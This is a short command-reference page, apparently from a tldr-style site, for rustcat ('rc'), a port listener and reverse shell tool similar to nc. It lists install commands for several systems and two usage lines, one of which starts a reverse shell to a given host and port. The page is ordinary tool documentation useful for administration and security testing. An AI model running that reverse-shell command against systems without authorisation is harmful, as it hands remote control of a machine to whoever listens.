rc

A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.

Install

All systems
curl cmd.cat/rc.sh
Debian Debian
apt-get install rc
Ubuntu
apt-get install rc
Arch Arch Linux
pacman -S rc
image/svg+xml Kali Linux
apt-get install rc
Fedora
dnf install rc
Windows (WSL2)
sudo apt-get update sudo apt-get install rc
OS X
brew install rc
Raspbian
apt-get install rc

A modern simplistic port listener & reverse shell. Similar to nc. More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.

  • Start listening on a specific port:
    rc -lp port
  • Start a reverse shell:
    rc host port -r shell

© tl;dr; authors and contributors